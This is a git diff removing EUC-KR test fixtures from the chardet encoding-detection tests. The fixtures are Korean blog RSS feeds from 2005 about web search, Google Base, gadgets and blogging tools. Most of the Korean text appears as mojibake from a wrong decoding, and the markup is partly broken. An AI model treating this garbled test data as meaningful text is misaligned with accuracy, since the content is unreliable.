    -»ח½ַ ֱײְ§¿¡¼± ³׳ְּ¹צ°¡ µ¿¿µ»ף °ֻ»צ¿¡ ֱרְװַ´´ֲ °ֽ ÷¸´ 300-400¸םְּ ְו¸י°ֻ»צְ» ְ§ַ״ µ¿¿µ»ף¿¡ ְ¸·ְ» »נְװַֿ°ם ְײ´´ֲ ¼ׂ½ִ¿¡ »לֲ¦ ³מ¶ף´ֲ ´«ִ¡´. ְּ°ֽµµ ÷»ְ־¿¡°װ ±׳´ֱצ ³מ¶רֱצ ¾´. ֱצ½ִinְַ ֵ÷»‎°ת ¼÷ְו°תֱ₪ְ» ÷¸¸י ³׳ְּ¹צ ¹ז½ְִ» ְַּ״ַׂ ¸¸µµ ַׁµ¥ ³מ¶ף´ֲ ְְּ¯´ֲ ¹»±מ? (³׳ְּ¹צ´ֲ ֳ¥, ְ½¾ַ °ֻ»צ TV±₪°ם¸¦ ַ´ר °זַטְ» »ל·ֱ µ¿¿µ»ף °ֻ»צµµ TV±₪°ם¸¦ ³»÷¸³»ֱצ ¾ְ»±מ ¿¹»ףµָ´. ±׳·³ ¶ַ »ח¶קµיְ÷ ¿×½ֳ ³׳ְּ¹צ¶ף°ם °ם°³¸¦ ²פ´צְּ°ֱצ. ³׳ְּ¹צְַ Trust´ֲ Capability·־ ´כ÷¯µַ´ֲ ¾ח»ףְּ´.(±׳·¸´¸י ´ְ½ְ÷..½־ְּ´ֲ..) ¶ַ ¾¶׳ַׁ ¾ך±ג¸¦ ÷פְ¸י ±ג¾קְ÷ ְ½ְֵּ ¹ת¾מµיְ־ µ·ְַ ְ‎¹ְ» ¸¶ֳִֶֹ ÷ס¿כְ¸·־ ¾²¶ף´ֲ ¾ך±ג°¡ ְײ´.) ¾ֶ¹«ֶ° ְּ·¯ַׁ ³׳ְּ¹צְַ ֶםֱ‎ ½÷ֵ³ְ÷ ±׳µי¸¸ְַ ³כַֿ¿ל¶ף ÷¼ ¼צµµ ְײ´. 1%ְַ ִק·¯ֶ¼ ³פְ÷ ֱצ½ִ´ה÷¯ְ÷ 20%ְַ »ח¿כְְַ ֲ¿©¸¦ ְ¯µµַֿ°ם 20%ְַ ֱצ½ֲִ¿©ְ 80%ְַ ֱצ½ִ¼ׂ÷סְ¸¦ ְ¯µµַֿ´ֲ °ְּֽ´. 80:20¹‎ִ¢ְ÷ ֶ¼ַ־ֶקְ־ֶ®´ֲ ֱצ½ִ°ֻ»צ ·־±׳µ¥ְֵּֽ¸¦ ÷׀¼®ַ״÷¸¸י ַ״´הְ» ֳ£ְ» ¼צ ְײְ» °ְּֽ´.
    -
    -±׳·³ ְו¸י°ֻ»צ¿¡ ´כַ״¼­ ¾ך±גַ״÷¸ְ. µ¿¿µ»ף °ֻ»צ¿¡ ְו¸י°ֻ»צְּ ַ¿הַׂ±מ? ְֿ¹ְ־µיְ÷ µ¿¿µ»ף °ֻ»צ ְֳ¼µµ ±׳´ֱצ °זַטַ״÷¸ֱצ ¸רְַ¸´ֿ ְו¸י°ֻ»צְּ ַ¿הַֿ¸®¶ץ »‎°¢ְ» ¸רֱַׂצµµ ¸נ¸£°´. ¶ַַׁ µ¿¿µ»ף ְֳ¼°¡ °ֻ»צ°ת ¾מ¿ן¸®ֱצ ¸רַֿ´ֲ ¸ֳֵ¼ְּ´ֿ ±׳·²¸¸µµ ַֿ´. ֱַֿצ¸¸ ½ז³׳ְְּֿ ½÷ִµ¿¡ ´כְְַֿ°ם ִ¸¼ְַּ °ֻ»צ¿¡ ´כְְַֿ´ֲ ±¸ֱ¶¶ף¸י ¾מ¶³±מ? ½ז³׳ְֿ°ת ִ¸¼ְַ÷ »ץ·־ ¿ְֲַַׁ ¸ְֵוְַ ±¸ֱ¶¶ף ÷»´¸י ³²ְ÷ °ַ ¹«¾שְ־ֱצ ְְֱּ °£´. ְ¯ֵכ¾קֳ¼´ֲ »ח¿כְ°¡ ¹«¾שְ»(¾מ¶² ֱ₪÷¸¸¦) ¿רַֿ´ֱֲצ ִֶ¾ַַֿ´ֲ °ְֽ» ³ׁ¾מ, ±׳°ְֽ» "¾מ¶»°װ" ֳ£°ם ¼ׂ÷סַֿ±ג¸¦ ¿רַֿ´ֱֲצ±מֱצ ִֶ¾ַַ״¾ַׁ´. µ¿¿µ»ף¿¡¼­ "¾מ¶»°װ"°¡ ְו¸י°ֻ»צְ־ֱצ´ֲ ֱ¶¸¸°£ »ח¿כְµי¿¡ְַַ״ ֶַ°¡¸§ ³×°ֱצ¸¸ ³׳ְּ¹צ´ֲ ְֿ´ ְְֲּ¸·־ ֵ« ¹«°װֱ½ְֹ» µ־¾ת´°ם ÷¸¸י µָ´.
    -
    -¸¶ֱצ¸·ְ¸·־ ֳ·¾נְַֿ¸י, ±ג¾קְ÷ »ח¿כְ¿¡°װ °¡ִ¡¸¦ ֱ¦°רַ״ֱײ´ֲ ְ»ח¸¸ְַ ַ½ֹ¿×·®°ת °זְן¿לְ§¸¦ ¾ֻ¾ֶ³ֲ´¸י ±׳ °¡ִ¡¸¦ ֳײ´כַׁ ֱ‎¿הַֿ°װ ֳֳגַ״³»¾ַׁ´. ±¸± CEO°¡ ±׳·¨³×? ְ±גµיְ÷ °ֻ»צְַ 3 ֱ₪µµ±מֱצ ¹¿¡ ¸ר¿װ´°ם..±׳·¡¼­ ¾ֱֶק °¥ ±זְּ ¸ײ´°ם... - ]]> -
    - ¼­÷ס½÷ְ·« - Tue, 6 Dec 2005 16:33:26 GMT -
    - - <![CDATA[ MS Fremont vs Google Base ]]> - http://ittrend.egloos.com/1994197 - - Microsoft Testing Its Own Google Base]
    -
    -MS°¡ ±¸ְ־±¸ֱק, ÷־µ¿»ך ±׳¸®°ם ¸ֵֶ¬¶ףְ־ ְ¯¸נֲק¿¡¼­ ÷¥ֳק ֱ°םֲק±מֱצ ´¾חַׁ ַ׳¸סµיְּ °ֵ·¡µֹ ¼צ ְײ´ֲ ¿ֲ¶ףְ־ Classified ¼­÷ס½÷¸¦ °³¹ ֱ¿¡ ְײ´. ִµו¸םְ÷ Fremont·־ fremont.live.com¿¡ ֵ¬·־ֱמ ֵ׳½÷ֶ®¸¦ ֱרַא ֱ¿¡ ְײְ¸¸ח ְּ´ֲ ֱצ³­ 11¿ש ±¸±ְּ ¼±÷¸ְ־ Google Base¿ֽ ְ¯»חַׁ ¾ֶ´ֿ ´כְְ ¼­÷ס½÷·־ ÷¼ ¼צ ְײ´.
    -
    -ֱַֿצ¸¸ MS´ֲ ±¸± ÷£ְּ½÷¿ֽ ֲקְֱּ¡ְ» °­ֱ¶ַֿ°ם ְײ´ֲµ¥ ±׳°ְֽ÷ ְ»חְַ °­ֱ¡(vs Google Base, Craigslist.org)ְ־ MSN ¸½ְֵת¿ֽ ַײ¸ְֿ, ¾ֶ¿פ·ט µמְַ ִ¿¹ֲ´ְִֹּֿ¼ַ ֳ₪³־ְ» ָ°¿כַׁ´´ֲ ֱ¡ְּ´. ֱ₪ָ®ָק ¾ך±גַֿ¸י ִ¿¹ֲ´ְִֹּֿ¼ַ ֳ₪³־ ֱן ¹צµנ¸®½÷ֶ®³× ֱײ¼ׂ·ֿ µמְַ ¼ׂ¼ָ ³׳ֶ®¿צֵ©(Social Network)¸¦ ְּ¿כַׁ´´ֲ °ְֽ־µ¥, ¿¹¸¦ µי¾מ ְְ°ֵ¸¦ ±¸ַׁ´´ֲ ±₪°ם¸¦ ³¾ ¶§ ְ½ְֵַ ֱצְ־ ³׳ֶ®¿צֵ©¿¡°װ ¹ְ§¸¦ ֱַׁ₪ַׂ ¼צ ְײ°ם, ֱצְ־µיµµ ¸½ְֵת³× ¸ְֿ µמְ¸·־ ¾ְֵֶּ ¸ס·ְֿ» ¾ֻ¸² ¹ז½ְִ¸·־ ¹¾ֶ ÷¼ ¼צ ְײ°װ µָ´´ֲ °ְּֽ´.
    -
    -ְּ¸¦ ÷סֱמ´ֿ½÷ ֳר¸י¿¡¼­ ÷¸¸י MS´ֲ Fremont¸¦ Live »חְֶּ®ְַ ְ·« ¼­÷ס½÷ ֱ ַֿ³×·־ ְּ¸¦ ±₪°ם ¼צְֽ±¸ֱ¶µµ ָ®÷¸ַֿ·ֱ°ם ַׂ °ְּֽ´. »ח¿כְ°¡ Fremont »חְֶּ®¿¡ ְ¯¸נֲק¸¦ °ֻ»צ, µמ·ַֿֿ°װ µֹ ¶§ ¿לֳר¿¡ MSְַ AdCenter(vs Google AdWords)·־ ÷־ֵֽ ³¯¶ף¿ֲ ¸ֵ¬¶ףְ־ ±₪°ם¸¦ ÷¸°װ µַ´ֲ °ְּֽ´.
    -
    -¿©ֶַֿ° MSְַ Classified ¼­÷ס½÷, ÷סֱמ´ֿ½÷¸¦ ¶°³×... e-¸¶ֳִַֿ·¹ְּ½÷ »ף¿¡¼­ְַ ÷¯ָ­ְַ ֶקְ־ֶ®µיְ» ְג¾ֶ³»°ם ְּ¿¡ ´כַׁ To Be ±׳¸²µיְ» ±׳·ֱ÷¸´ֲ °ְּֽ ַ¿הֱַֿצ ¾ְ»±מ ַׁ´.
    -
    -
  • [Related Posts]
    -±¸± ÷£ְּ½÷ ·±ִ× ±׳¸®°ם °£´דָ¸ ÷ֲׂ
    -±¸± °זֱ¦, Google Economy
    -Google Base, ±¸±ְַ ½ֵ÷´±ג
    -¸¶ְֵּ©·־¼ֱֶַׂ®, ְ©µµ¿ל ¶ףְּ÷ךְַ ְ·«ְ ¹ט°ז - ]]> - - ½ְֳוµ¿ַג - Sun, 4 Dec 2005 16:26:16 GMT - - - <![CDATA[ The most amazing invention of 2005 ]]> - http://ittrend.egloos.com/1993358 - - -
    -»‎¸ם°ת ¾ְְָּ¶ף´ֲ ֵ°¿צµו·־ ½÷³ַַ ¼ׂ°³·־ ½ְֳµַ´ֲ ¾ֶֶ¼ֵ¬ְ÷...
    -
  • 3´·¯ֲ¥¸® ָ´כ¿כ ֱ₪¼צ »¡´כְ־ LifeStraw,
    -
  • °ר±ג¾ר´ֲ ֵ¸ְּ¾מ·־ ֶדֵ© °ֱֶ₪¾ר´ֲ ¹ּ½¦¸° ֵ¸ְּ¾מ,
    -
  • 4´·¯ֲ¥¸® ¼צ¼ׂ ִµְ¸·־ 100¸¶ְֿ ְּ»ף ֱײַאְּ °¡´ַֹׁ ¹«°רַ״ ¿ְֵה¹ְּ
    -
  • ½÷¸¶ֶ® ֱ¦ַ°ְ¸·־´ֲ ָײ¾מֱצ´ֲ ֳֻ°¢ ¼¾¼­
    -
  • ַַ·־°¡ ֳײ¼ָׂ­µָ ½ֳ°£´כ¿¡ ¾ֻ¶קְ» ֱײ´ֲ ¼ק¸י°¨ֱצ ¼ױ¸ס½ֳ°ט,
    -·־ ¸ֵ·ְְֲ־ ֱ¦ַ°µיְ» ¼ׂ°³ַֿ°ם ְײ°ם,
    -
    -¶ַַׁ ·־÷¿ °¨¼÷ְ» ְֿ±ת¿צֱײ´ֲ ·־÷¿°ת ½÷¸¶ֶ® ֱ¦ַ°ְ¸·־
    -
  • ´« ¸¶ֱײִ§ְּ °¡´ַֹֿ°ם ֱײְ־ְ» ¾ֻ¾ֶ÷¸´ֲ µµ½ֳ¹ְַ ApriAlpha,
    -
  • ´כָ­³»¿כ¿¡ µ¶ף ´¾חַֿ°װ ¾ף±¼ ַ¥ֱ₪ְ» ֱ‏´ֲ Phillipsְַ iCat,
    -
  • ֳדֳ°ם ¸»ַֿ´ֲ ZMP ´©÷¸,
    -
  • 15°¡ֱצ ¸®µכַ ±ג¾ןְ¸·־ ¹ְְַֿ´ֲ ´ִ«¶ף °ֵ÷ְּֿ ְו³­°¨ ·־÷¿,
    -
  • µµ¿הֵ¸ְַ 4· °³ְ־¿כ ְּµ¿ ·־÷¿,
    -
  • 3¸¸¿רְַ °¡°ְ¸·־ 20÷׀ ֳװ¿µ(DVD·־ ְתְו)ְּ °¡´ַֹׁ ְָֿ¸¿כ ִ·ִ´ץ,
    -
  • 48ֳ¸י ֶ״ֳ¢ַֿ¿© ¿ֿ¼÷µַ´ֲ ֵֶ®(¿¹ְ ´ֵֽ½½·³ֱַ ¸¸ָ­¿¡¼­ ְֱײ µמְו^^)
    -
  • TV ¹ז¼ ½ֵָ£¸¦ ְ־ֵֽ³ְ¸·־ ÷¯ָ¯ ְ¼ַֿ´ֲ ½½¸µ¹ּµנ¾מְַ SlingBox
    -¼ׂ°³ַֿ°ם ְײ´.
    -
    -ֲ°ם·־ ¸¶ֱצ¸·¿¡ °ֵ·׀µָ SlingBox´ֲ ְּ°ק¿¡ ְ¼¼ָק ¼ׂ°³µַ¾מ ְײ´ֲµ¥, ¾ף¸¶ְ ¼ׂ°³ַׁ Q¹½÷´ֲ ְתְ±ַ ¹‎ֱ¦µµְַ ֵ׳µ־¸®¸¦ ¹‏¾מ³µְ¸³×, SlingBox´ֲ ¹ז¼¹‎ְַ ֵ׳µ־¸®¸¦ ¹‏¾מ³×ֱצ(±¹³»¿¡¼­´ֲ) ¸רַׂ °ֽ °°´. ֱ₪ַ״ֱר ´¸»±ג(TV)¿¡¼­¸¸, ֱ₪ַ״ֱר ±¸¿×(°ֵ½ַ)¿¡¼­¸¸ ¼ׂ÷ס°¡ °¡´ַֹׁ ֱֳִֵקµיְ» ַ®¾מֱא¾ ¾ױְ¸·־ ֵ¸ ¸ֳֵ¼µי°תְַ °זְן¿¡¼­ »ל¾ֶ³²ְ» ¼צ ְײֱצ ¾ְ»±מ? ÷¸ְֱּצ ¾´ֲ °קְ÷ ¸ױְת °¡´ֲ ְ°¡ ±זְ» ¸¸µו´ֲ ¹‎ְ־µ¥ °¡´ֲ ְְַ ¹¸ס±מֱצ ְג¾ֶ¼­¾...
    -
    -
    - ]]> - - ְ¯÷סִץֵֽ½÷ - Sun, 4 Dec 2005 12:58:50 GMT - - - <![CDATA[ [ֳ₪¿כ] ¸נ½´ֿ´ ]]> - http://ittrend.egloos.com/1976328 - - -°½ֹ ְײְ¸½ֵ ÷׀ְ÷ ֱײְתֱַֿצ ¸¶½ֳ°ם ¸ְֿ(gustn009@nate.com) ֱײ¼¼¿ה.
    -°¨»חַױ´ֿ´. ^^. ¾ֲֶ ÷׀¾´ֲ ְ־ֵֽ³ ֶקֵ׀ְװ´ֿ´.
    -
    -1. ְ»ח ¼­÷ס½÷ ֶקֶ®ֶת¸®¿ְ ְ·« ¼צ¸³ ¹׳ ¼­÷ס½÷ ְ·« ÷׀¼® ¾ק¹«¸¦ ´ד´חַׂ ÷׀ְ» ¸נֱ‎ַױ´ֿ´.
    • »ח¾קְ·« °זַט 3³ג ְּ»ף

    • -
    • ¼­÷ס½÷ ±גָ¹ °זַטְ ¿ל´כ

    -2. »ח¾קָ¯°ז ÷¯ָ­ ÷׀¼®ְ» ֵכַ״ »ח³» ֵ¸ ÷־¹®¿¡ ֳ¼°טְְ־ ¸®¼­ִ¡¸¦ ֱ¦°רַֿ´ֲ ¾ק¹«¸¦ ´ד´חַֿ½ַ ÷׀ְ» ¸נֱ‎ַױ´ֿ´.
    • »ץ·־¿מ ±ג¼ת ¹׳ ¼­÷ס½÷ trend¿¡ ´כַׁ °½ֹ°ת ְַּ״°¡ ³פְ¸½ֵ ÷׀

    • -
    • ¼­÷ס½÷ ±גָ¹/ ±ג¼ת ±גָ¹ ¾ק¹« °זַטְ ¿ל´כ

    • -
    • ±¹³»¿ °זְן»ח ¼­÷ס½÷ ÷׀¼®, ³׳ֶ®¿צֵ© ÷׀¼®, ֵכ°ט ÷׀¼®
    - ]]> -
    - ³×ְַ½÷ֵה¸® - Tue, 29 Nov 2005 04:24:58 GMT -
    - - <![CDATA[ Q~ֵ¥¿ל, Social Music Search ]]> - http://ittrend.egloos.com/1967561 - - Techcrunch ¿¡ "Companies I¡¯d like to Profile (but don¡¯t exist)" ְּ¶ץ ֱ¦¸סְַ ±ְּ ֶק½÷ֶ®µַ¾מ ¿×´כ(~2005.11.26) ֵ׳ֵ©ֵ©·±ִ¡ »ח»ף ֳײ´כְַ µ¡±°ת ֶ®·¢¹יְ» ³²±ג°װ µַ¾ת´. ±׳µיְּ °ר°³ַׁ "ַגִָ ַ״÷¼¸¸ַׁ ְ¥ 2.0 ½ֵ±װ ¼­÷ס½÷µי"ְ÷ ¾ֶ·¡¿ֽ °°´.
    -
    1. Better and Cheaper Online File Storage
    -2. Blog/website Email Lists
    -3. Portable Reputations
    -4. Tailored Local Offers (via RSS)
    -5. Facebook, in other countries
    -6. Free Music
    -7. Open Source Yellow Pages
    -8. Podcast Transcriptions
    -9. Decentralized Review Aggregation
    -10. Build Something Cool with SSE
    -

    -½ֳ°£³»¼­ ֶק½÷ֶ®¸¦ ֲ¿ם ְ׀¾מ÷¸¸י ְח¹ױְ» °ְּֽ´. ÷»ְ־µµ ְ§ ¾ְֶּµנ¾מµי ֱ ¸מ°¡ֱצ ְח¹ױ´ֲ ¶ַ ´¸¥ °ֽµיְ» ¿¬ְו½ֳֵ³ ¼צ ְײ¾מ ³×¸§´כ·־ ָו¹µַ´. ¹°·׀ ֱ¦½ֳµָ ¾ְֶּµנ¾מµי ֱ ְּ¹ּ ֱרַאµַ°ם ְײ´ֲ °ֽµµ ְײְ¸¸ח ֱצ± ¸· °³¹¿¡ µי¾מ°£ ֱַ·־ֱ§ֶ®µיµµ ְײ´°ם ÷»´.
    -
    -ֲ°ם·־ ְ§ ¿¹½ֳ ֱ "6¹ר Free Music"¿¡ ´כַ״ ְּ¹ּ ³×¿ֲ »ח·¸¦ µיְ¸י "Q~ֵ¥¿ל"¶ף´ֲ ÷ם·־±׳, ¹ּ´ָֿ¨ַַ ¹ט°זְ½¾ְַ» ½±°װ °ֻ»צַ״¼­ ¹«·ב·־ µיְ» ¼צ ְײ´ֲ ¼­÷ס½÷°¡ ±׳ ְֱֱ÷ ¿¹¶ף ַׂ ¼צ ְײ°´. http://qbox.com¿¡ °¡¼­ ֵר¹¸¦ ¼³ִ¡ַֿ¸י ³¡. ְִָּ ÷ם·־±׳, ¹ּ´ָֿ¨ַַ¿¡ ְײ´ֲ ¹ט°זְ½¾ַµיְ÷ ¿רַׂ¶§¸י ¾נֱ¦µחֱצ µיְ» ¼צ ְײ´.
    -
    -

    -
    -¶ַַׁ ֵ¥¿ל ÷ם·־±׳¿¡ °¡¸י ±׳µיְּ ְּ ¼­÷ס½÷¸¦ ¸¸µח µ¿±ג¿ֽ ¿©·¯°¡ֱצ ±ג´ֹµיְּ ¼ׂ°³µַ¾מְײ´. ±׳µיְַ ¼­÷ס½÷ ¸נµ¨ְ» °¡ְו ¸םָ®ָק ¼³¸םַֿ°ם ְײ´ֲ ¹®ְוְ» ¹ֳיַ״ ÷¸¾ׂ´. "ְ½¾ַ ½÷ֶ®¸®¹ײְ» ֱײ·־ ¼­÷ס½÷ַֿ´ֲ ¾קֳ¼µיְַ °ז¿ל ¾א 5~8 µ¿ְְ» ַ״¾ ְ½¾ְַ» µיְ» ¼צ ְײ´ֲµ¥ ְּ ¼­÷ס½÷´ֲ ´ 2 µ¿ְְ¸·־ ¿רַֿ´ֲ ְ½¾ְַ» µיְ» ¼צ ְײ´." ְּ¿ֽ °°ְ÷ ¼­÷ס½÷ ¸נµ¨ »׃¸¸ ¾ֶ´ֿ¶ף °ֻ»צ·־÷¿ְ» ¾²ֱצ ¾ְ÷ ְְּ¯¿ֽ ַױ¹‎¼÷¿¡ ´כַׁ ¼ׂ°³³»¿כְ» ÷¸¸י ¿©·¯°¡ֱצ ¸¹ְ÷ »‎°¢µיְ» ַֿ°װ ¸¸µח´.:-)
    -
    -³׳ְּ¹צ ֱצ½ִ°ֻ»צ(ֱצ½ִin)ְ÷ ±¸±°ֻ»צ°ת ´¸£´. ±¸±ְ÷ °ֻ»צ·־÷¿ְּ ¾ֻ°ם¸®ֱע(RageRank)ְְ¸·־ Right Informationְ» ֳ£¾ֱֶײ´ֲ °ְּֽ°ם ֱצ½ִinְ÷ ±ג¼תְּ ¾ֶ´ֿ¶ף »ח¶קְּ ְ½ְֵַ ֱצ½ִ°ת ָ£ְַ¸¦ °¡ֱצ°ם Right Informationְ» ´¾ֱֶײ´ֲ °ְּֽ´. ְ¥ 2.0 ֵ°¿צµוְ־ ֱ‎´ֱצ¼÷ְּ¶ץ ÷ם·־±׳, ְ§ֵ° »׃¸¸ ¾ֶ´ֿ¶ף ³׳ְּ¹צ ֱצ½ִin¿¡µµ ְ§¿ֽ °°ְ÷ ֵ¥¿ל ¼­÷ס½÷µµ °°ְ÷ ¸ֶ¶פ¿¡¼­ ֱ¢±ַ״ ÷¼ ¼צ ְײ´.
    -
    -ְּ¿¡ ֵ¥¿ל¸¦ ַֿ³×ְַ Social Music Search¶ף°ם ¸»ַֿ°ם ½ֽ´. ±׳·³ ´ְ½¿£ ¾מ¶² ְח¹ױ´ֲ ¼ׂ¼ָ °ֻ»צ ¼­÷ס½÷µיְּ µמְוַֿ°װ µֱֹצ ±ג´כµָ´. - ]]> -
    - ½ְֳוµ¿ַג - Sat, 26 Nov 2005 07:21:50 GMT -
    - - diff --git a/chardet/tests/EUC-KR/jely.egloos.com.xml b/chardet/tests/EUC-KR/jely.egloos.com.xml deleted file mode 100644 index adb90f8..0000000 --- a/chardet/tests/EUC-KR/jely.egloos.com.xml +++ /dev/null @@ -1,143 +0,0 @@ - - - - - blogger jely - http://jely.egloos.com - ֱ©¸®ְַ ³מְֵּֽ - ko - Tue, 6 Apr 2004 08:28:18 GMT - - blogger jely - http://pds2.egloos.com/logo/1/200510/24/74/b0000374.jpg - http://jely.egloos.com - 80 - 80 - ֱ©¸®ְַ ³מְֵּֽ - - - <![CDATA[ 2005³ג ³» ְּ±·ח °ב»ך ]]> - http://jely.egloos.com/2069254 - -

    1. ֶק½÷ֶ® : 270°³

    19
    stat_graph
    18
    stat_graph
    22
    stat_graph
    28
    stat_graph
    27
    stat_graph
    19
    stat_graph
    16
    stat_graph
    26
    stat_graph
    27
    stat_graph
    14
    stat_graph
    32
    stat_graph
    22
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    2. µ¡± : 823°³

    43
    stat_graph
    30
    stat_graph
    73
    stat_graph
    114
    stat_graph
    58
    stat_graph
    69
    stat_graph
    63
    stat_graph
    70
    stat_graph
    48
    stat_graph
    82
    stat_graph
    106
    stat_graph
    67
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    3. °·ֳ± : 49°³

    1
    stat_graph
    2
    stat_graph
    1
    stat_graph
    9
    stat_graph
    7
    stat_graph
    1
    stat_graph
    1
    stat_graph
    6
    stat_graph
    7
    stat_graph
    1
    stat_graph
    6
    stat_graph
    7
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    4. ³»ְּ±·ח ±ג³׳½÷

    - ]]> -
    - ¹ּ÷׀·ש - Fri, 30 Dec 2005 05:57:26 GMT -
    - - <![CDATA[ 2006³ג ¿¬±¸°תֱ¦ ]]> - http://jely.egloos.com/2059033 - - ´ְ±ַׁ »ח¿כְ (by yaaong) - ]]> - - planning - Mon, 26 Dec 2005 16:28:59 GMT - - - <![CDATA[ Merry Christmas! ]]> - http://jely.egloos.com/2051855 - -
    Merry Christmas!


    ֶַׁם del.icio.us ¿¡¼­´ֲ...
    ±ֽ¿±´. ^^ - ]]> -
    - ¢½ - Sat, 24 Dec 2005 03:21:24 GMT -
    - - <![CDATA[ handmade ipod nano knit case ]]> - http://jely.egloos.com/2041598 - - ³­ָ£±÷, ±׳µ¿¾ָ ֳ¿ֱצ? ¿ְ´ֳ÷־ֵֽ ֵ׀¿ְװְ~ 2005³ג ֳ¹ ְַ°ְװ´ֿ´. - ]]> - - hobby, handmade - Tue, 20 Dec 2005 13:05:33 GMT - - - <![CDATA[ ±·־¹ת¼­÷ס½÷ ¸¶ְ־µו ]]> - http://jely.egloos.com/2040607 - - flickr.com capture
    -ְּ±·ח½÷¿¡¼­µµ ´ְ½ ֱ¡°ֻ¶§÷־ֵֽ´ֲ ַ״¿ ְ¯ְת¿¡ ´כַׁ ¹ט·ֱ¸¦ ַ״¾°½ְ´ֿ´. - ]]> -
    - blog, egloos - Tue, 20 Dec 2005 06:19:57 GMT -
    - - <![CDATA[ ÷ם·־±׳ ¾מ¿צµו ִָ÷¸ ¹ַ¥ - liveblog.org ]]> - http://jely.egloos.com/2040075 - - liveblog ¿¡¼­ 2006³ג ÷ם·־±׳¾מ¿צµו ֳײֱ¾ ִָ÷¸¸¦ ¹ַ¥ַ½ְ´ֿ´.
    -
    -¶ףְּ÷ך÷ם·־±׳2´ֲ ְּ±·ח½÷¿¡¼­µµ °רֱצ¸¦ ַ¾תֱׂ. ¶ףְּ÷ך÷ם·־±׳´ֲ ¾ֱֶק ±װ¸נ³× ¿µַג·ֲµµ ְ°ם, ֱ₪ִ¡ְְ־ ¸נ½ְְּ ¿×·ֱֲַֿצ¸¸, ±¹³»¿¡¼­´ֲ ְ¯ְַֿֿ°װ ÷ם·־±׳ ¼­÷ס½÷¿¡ »ף°¾רְּ ¸נµח ÷ם·־°ֵ°¡ ַװ²² ַׂ ¼צ ְײ´ֲ ¾מ¿צµוְװ´ֿ´. ְֱֱ÷ ÷ם·־±׳¸¦ ¼ׂ°³ַ״ֱײ´ֲ ¿×ַׂ¸¸ְ¸·־µµ ְַ¹ְּײ´ֲ ַא»חְװ´ֿ´.
    -
    -ֳײֱ¾ִָ÷¸¿¡´ֲ ¾ֶ´ֲ ÷׀µיµµ ¸¹ֱצ¸¸ ְ ¸נ¸£´ֲ ÷׀µיµµ ¸¹¾ֶ¼­ ´ ¹ז¹®ַֿ°ם ֵץַ¥ַֿ´ֲµ¥´ֲ ½ֳ°£ְּ ֱ» °ֹ¸®°³׳¿ה. ֵנ±ַֿ°ם ֳµֳµָק »לֶל÷¼¶ר´ֿ´. - ]]> -
    - blog, egloos - Tue, 20 Dec 2005 02:25:16 GMT -
    - - <![CDATA[ igloo ]]> - http://jely.egloos.com/2030806 - - multitasking
    igloo_outside.jpg,
    originally uploaded by timeggelton.
    ¾מֱ¦µµ Mac ¿¡¼­ »ח¿כַׂ ¼צ ְײ´ֲ Flickr Pluginְ» ¼ׂ°³ַ¾ת´ֲµ¥, Flickrְַ ְּ°ֽ ְת°ֽ »ח¿כַ״ ÷¸°ם ְײ½ְ´ֿ´. ֶ¯ָק Flickr ְַ BlogThis ¶ף´ֲ ±ג´ֹ ¹«ֱצ ֱֱ±÷¿ה. ְּ±·ח½÷ XML-RPC °ר°³°¡ ±ג´כµֻ´ֿ´.
    -
    -»חֱרְ÷ ְּ±·ח½÷¿¡¼­ ֱצ¿רַֿ´ֲ MetaWeblogAPI¸¦ ְּ¿כַֿ¿© Flickr ¿¡¼­ ֶ¿װ½ְ´ֿ´. - ]]> -
    - palm, mac, gizmo - Fri, 16 Dec 2005 15:41:22 GMT -
    - - <![CDATA[ ְַַַך ]]> - http://jely.egloos.com/2030503 - - ֱ‎¿¡ µי¾מ¿ְ´÷¸´ֿ ¿לֳ¼ֵכ¿¡ ְַַַך ֵ¹»ף¿כ ´·ְֲּ µי¾מ ְײ¾ת½ְ´ֿ´. ְתֵַׁ׳ ¿ֲ °ֽµµ ¾ֶ´ֿ°ם ָ«÷¸¿כְ¸·־ ±׳³ֹ ֱ‎¸¶´ ³ײ¾מ ³ץְ÷ °ְּֽ¾ת½ְ´ֿ´. ְַַַך, ¿×½ֳ µ· ¸¹±÷¿ה.
    -´·ְֲ÷ »‎°¢÷¸´ ±¦ֲת³׳¿ה. °¢ ´¸¶´ »ח¿כַׂ ¼צ ְײ´ֲ ִםֶשµµ ְײ±¸¿ה. ±׳·¡¼­ ÷¸ְּ´ֲ°ֵ ´ µי°ם µי¾מ¿װ½ְ´ֿ´. ַ¿הַֿ½ֵ ÷׀ ¸»¾¸ַֿ¼¼¿ה.(´, ¿לֶם ¹¼ְ÷ ¾ַָױ´ֿ´. -_-;;) - ]]> -
    - thinking - Fri, 16 Dec 2005 14:17:41 GMT -
    - - <![CDATA[ Flickr.com - iPhoto plugin ]]> - http://jely.egloos.com/2025852 - - BubbleShare.com ְַ pluginְ» ¼ׂ°³ַ¾ת´ֲµ¥, Flickr.com¿¡µµ ´ח¿¬ָק ְײ¾ת±÷¿ה. ¹·־ FlickrExport ְװ´ֿ´.
    -
    -±׳·¸´¸י ְּ±·ח½÷µµ ´ח¿¬ָק;; - ]]> -
    - palm, mac, gizmo - Thu, 15 Dec 2005 04:56:53 GMT -
    - - <![CDATA[ A Proud Member ]]> - http://jely.egloos.com/2025309 - -

    "A Proud Member of 9rules Network"


    -Special Memberµµ ¾ֶ´ׁ Paid Memberµµ ¾ֶ´ׁ, ±׳·¸´°ם Plus Memberµµ ¾ֶ´ׁ PROUD Member. ¿״ֱצ ²ר¸°´. - ]]> -
    - planning - Thu, 15 Dec 2005 00:48:44 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/jely.pe.kr.xml b/chardet/tests/EUC-KR/jely.pe.kr.xml deleted file mode 100644 index 646bab5..0000000 --- a/chardet/tests/EUC-KR/jely.pe.kr.xml +++ /dev/null @@ -1,339 +0,0 @@ - - - - - -blogger jely ver2 -http://jely.pe.kr/ - -en-us - - blogger jely ver2 - http://jely.pe.kr/jely.pe.kr.jpg - http://jely.pe.kr/ - 80 - 80 - blogger jely ver. 2 - -jely@natoo.net -2004-11-24T02:22:24+09:00 - -hourly -1 -2000-01-01T12:00+00:00 - - -blogger jely ver3 -http://jely.pe.kr/archives/2004/11/20041124_000258.html -blogger jely ver 3 